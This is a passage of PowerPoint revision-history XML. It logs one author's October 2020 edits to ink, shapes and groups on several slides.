          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.125" v="168"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="72" creationId="{E4E7A269-204C-4DD4-B4E7-1AFB729391E0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:57.253" v="147"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="75" creationId="{0B4C9780-20FB-4794-BB06-AA17596AA0FF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:19.677" v="165"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="78" creationId="{234DF971-82C2-4DF5-85D1-3DCC0E05013A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:16.356" v="162"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="81" creationId="{CD47C2B3-0B07-4852-807E-69532B49A611}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:15.571" v="159"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="84" creationId="{BBA8DF87-549B-4686-9ACB-F3A5ED0850F1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:35.045" v="190"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="88" creationId="{A06FF425-7092-4682-AC90-B46385051EB8}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:39.398" v="196"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="92" creationId="{E6D9DDC5-2C71-40C7-A8A0-3F04CE5A1EF8}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:51.410" v="212"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:grpSpMk id="102" creationId="{25DAA3C6-B265-4C1B-A666-8F9616628DA1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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6" creationId="{0D808668-53C7-4D9A-8821-9FF5AC429F8B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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9" creationId="{2271E70E-D959-42BD-8763-6834E29292C0}"/>
          </ac:grpSpMkLst>
        </pc:grp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2" creationId="{C4663246-85BC-4995-94D1-1F8E0EE259AC}"/>
          </ac:inkMkLst>
        </pc:ink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3" creationId="{B7ECFD13-94BD-4890-894C-C21BF9CA2FAA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:22.331" v="180" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="51" creationId="{336E2780-4D4D-4B65-8C95-E82238B35178}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:19.453" v="121" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="52" creationId="{E9F9E64C-E4AF-4C7A-BF28-DA49E7A828FC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:19.087" v="120"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="53" creationId="{1E2A558E-1BC3-4453-9610-E293A687B9E7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:22.090" v="179" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="55" creationId="{A6F1D9E8-1CDA-42F2-A7B5-5642C389D2AD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:24.680" v="126"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="56" creationId="{8F7B0075-2162-464D-A967-0608AD26F3EF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:28.601" v="128" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="58" creationId="{43B6F4E8-4AB2-4BCD-9BE4-A223E708FDEE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:33.658" v="130" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="59" creationId="{7BD51D14-927F-4A40-AD7A-DF9710D49681}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:21.851" v="178" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="60" creationId="{F8959E62-FB97-4EEF-9004-7D71C889CCDF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:21.634" v="177" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="61" creationId="{7972095F-D8DE-4131-B38B-57C34DC8392E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:21.388" v="176"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="62" creationId="{B26B78D3-BA1B-4A56-A5C4-DAA0DDDEA2B0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:21.166" v="174" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="64" creationId="{5E5243ED-B90E-4EA9-99D7-78D39F86EB2B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.978" v="173" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="65" creationId="{7DE17FE1-5E7E-4AF7-B909-E3464556484C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.810" v="172" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="66" creationId="{D4302EFB-D761-4A3B-BA65-E74D24390B87}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.643" v="171" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="67" creationId="{B43D39CA-A43C-42C8-A45D-977362A2428F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.466" v="170" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="68" creationId="{BB64C128-BF6C-42E2-BC10-7B8E968624C8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.315" v="169" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="69" creationId="{F1A117CF-8E0E-4168-8D7C-325EDA0F2286}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:20.125" v="168"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="71" creationId="{491350A5-5120-455D-9474-D3A23EC407C8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:58.796" v="148" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="73" creationId="{AC1385C5-32FE-4A96-B804-8AEA1F45F7C7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:00:57.253" v="147"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="74" creationId="{CE1157DE-50A7-4504-81CD-7911D86A911C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:19.930" v="166" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="76" creationId="{FA5993F7-4C8F-4807-9F89-A549799FABF2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:19.677" v="165"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="77" creationId="{DB250E57-C43D-4D7C-8E33-997898ABE14F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:16.860" v="163" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="79" creationId="{0C6917BB-1807-4D62-BCB5-10EA8D928BFF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:16.356" v="162"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="80" creationId="{7B18C1A8-DD13-485E-8534-E7BB0ACD087A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:16.074" v="160" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="82" creationId="{D287F8B7-AE77-43EB-A51A-8070E778E400}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:15.571" v="159"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="83" creationId="{AF24B287-CF12-4C1F-81F1-383D4D2F2157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5" creationId="{05E5A83A-7065-4FD2-97FD-34DBF5CCCA30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6" creationId="{71B84735-1FC3-47EB-85E6-A1A868687524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7" creationId="{FAAF711D-E907-472E-AA74-424EF93BEAFC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:41.189" v="198" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="89" creationId="{E3248F90-13A1-45C0-8FFC-95FF49572F3C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:39.564" v="197" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="90" creationId="{79ACFC09-C0AE-4048-8663-81ABB03F9C96}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-10T20:01:39.398" v="196"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="490495379" sldId="258"/>
            <ac:inkMk id="91" creationId="{AE2751FE-42AF-412E-A91E-583A0F12919E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3" creationId="{05968BF0-014C-49F0-B284-91DA0083EA4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4" creationId="{87C5E366-0B1D-4DF2-84C8-F5B036437D8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5" creationId="{3D3350B2-FC1B-4C32-A0A8-881C82C1AB06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6" creationId="{D61632D1-D7C5-4D2F-9CF2-9C21EDE07B9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7" creationId="{852F6FB4-9D0E-4DA0-A255-D876424581F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8" creationId="{D74E86FE-97E6-4A87-9605-BE049258A21C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9" creationId="{F2EE59C4-B0F2-4A89-81BF-707B217A1A14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0" creationId="{12308E98-0954-42F5-9F3E-C31C0AAD26DA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1" creationId="{3BD368C8-D4BD-4E09-A0BE-75F575836238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3" creationId="{3A9F6E8E-0DEA-4229-A370-7D51276DAE01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4" creationId="{3F50D468-DC12-45D0-9EC4-75302B9FBA9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5" creationId="{FC859DBD-EFB9-4E06-B55D-C0129FD1B84D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7" creationId="{C89F2A11-C16B-42BF-85C6-3333AB6EE3D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8" creationId="{3C152BD6-745D-4517-9C04-2201F79E9A9D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98096012" sldId="258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10432342" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modClrScheme modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:33:33.625" v="2100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3831177413" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T09:31:12.829" v="249" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3831177413" sldId="259"/>
            <ac:spMk id="2" creationId="{5D9C9289-D5CE-41B5-BAEC-D2F1C6C1B454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9" creationId="{029FD7A6-C23E-45FA-854E-C42AF3D3C3F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1" creationId="{77D41AEB-E11F-4948-84D0-2290CB966A13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3" creationId="{7976E1D5-3B6D-4A24-9848-1384479AF41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5" creationId="{A5E7B76F-0876-4045-9E0B-1530BC790D3C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T09:56:22.836" v="393" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3831177413" sldId="259"/>
            <ac:spMk id="16" creationId="{6339F781-B431-4DFB-8B95-94B7F1A7573A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T09:56:49.532" v="439" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3831177413" sldId="259"/>
            <ac:spMk id="17" creationId="{E2CEA003-A954-4397-8B16-B0AAEC754F5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T09:57:16.092" v="480" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3831177413" sldId="259"/>
            <ac:spMk id="18" creationId="{34D7E701-6027-47BE-A903-AC7456C4D140}"/>
          </ac:spMkLst>
        </pc:sp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4" creationId="{C27670DE-88CA-4F50-B2AB-FA8F29798267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6" creationId="{DB2D7E5B-AF9D-4D39-9C96-6D10CFD51AF9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8" creationId="{474BBF71-FB7E-4B20-B0FF-A25D0469820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404830931" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-17T12:36:33.827" v="2213"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2242768232" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T10:01:28.051" v="673" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2242768232" sldId="260"/>
            <ac:spMk id="9" creationId="{029FD7A6-C23E-45FA-854E-C42AF3D3C3F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T19:36:55.213" v="676"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2242768232" sldId="260"/>
            <ac:spMk id="14" creationId="{0A2C298A-8C52-462C-855B-AF897B2510C6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-11T09:59:11.868" v="493" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2401671719" sldId="260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303257976" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:40:12.990" v="17170"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3628453235" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T20:07:24.936" v="822" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261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4T20:10:50.183" v="894" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261"/>
            <ac:spMk id="71" creationId="{D2FD5C08-158B-4BFD-A101-CDF7EDC8193B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-15T20:25:40.447" v="1332" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261"/>
            <ac:spMk id="73" creationId="{F5ACDF27-8721-44AB-B8A0-137A0EBD7873}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T20:11:36.532" v="905"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261"/>
            <ac:spMk id="74" creationId="{0BA27688-EB34-4C86-A30B-0E2D4C55602E}"/>
          </ac:spMkLst>
        </pc:s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7" creationId="{A42B326E-C40B-4062-8C5F-2B6FD747C069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0" creationId="{13AB5692-3981-43C3-A733-DF84A851B3C4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3" creationId="{02EFBEDF-D6C3-4EE8-808D-013421492292}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T20:08:16.624" v="824" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261"/>
            <ac:grpSpMk id="24" creationId="{FC1A96F3-ED6A-44C0-A6F9-73D1F01EAE4F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T20:10:33.218" v="883" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3628453235" sldId="261"/>
            <ac:grpSpMk id="34" creationId="{948B3354-19FB-4556-99B0-E54C89C6C8A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6" creationId="{CE4CD41E-00DD-481C-9733-09E84AABFF1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7" creationId="{BC6059C8-5988-4A22-89CB-46D2F928C131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8" creationId="{8A91734D-CEFA-487B-B6D3-71D9EB9174AF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49" creationId="{2A243E94-2963-4E45-BD18-B922CE27C85C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2" creationId="{31EBBE44-3FA8-43AC-AC61-B4E44880C5B5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6" creationId="{94447EE6-B656-4ADA-986A-0C9FB930FE33}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-14T20:09:04.638" v="877" actId="1035"/>
          <ac:picMkLst>
